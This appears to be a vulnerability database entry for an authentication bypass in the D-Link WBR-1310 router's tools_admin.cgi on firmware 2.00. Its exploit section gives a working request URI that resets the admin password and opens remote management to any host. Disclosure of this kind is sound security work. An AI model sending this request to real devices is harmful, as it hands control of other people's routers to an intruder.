ID
VAR-E-201012-0314
TITLE
D-Link WBR-1310 'tools_admin.cgi' CGI Script Authentication Bypass Vulnerability
Trust: 0.3
DESCRIPTION
D-Link WBR-1310 is prone to an authentication-bypass vulnerability.
Attackers can exploit this issue to bypass authentication, change the administrative password and gain administrative control of the affected device.
D-Link WBR-1310 with firmware version 2.00 is vulnerable; other versions may also be affected.
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | d link | model: | wbr-1310 | scope: | eq | version: | 2.00 | Trust: 0.3 |
| vendor: | d link | model: | wbr-1310 | scope: | ne | version: | 4.13 | Trust: 0.3 |
EXPLOIT
Attackers may exploit this issue through a browser.
The following example URI is available:
http://www.example.com/tools_admin.cgi?admname=admin&admPass1=hacked&admPass2=hacked&username=user&userPass1=WDB8WvbXdHtZyM8&userPass2=WDB8WvbXdHtZyM8&hip1=*&hport=8080&hEnable=1
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Access Validation Error
Trust: 0.3
CREDITS
Craig Heffner
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 45554 | Trust: 0.3 |
REFERENCES
| url: | http://www.devttys0.com/wp-content/uploads/2010/12/wbr310_auth_bypass.pdf | Trust: 0.3 |
| url: | http://www.dlink.com/products/?pid=474 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 45554 |
LAST UPDATE DATE
2022-07-27T09:35:55.787000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 45554 | date: | 2010-12-23T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 45554 | date: | 2010-12-23T00:00:00 |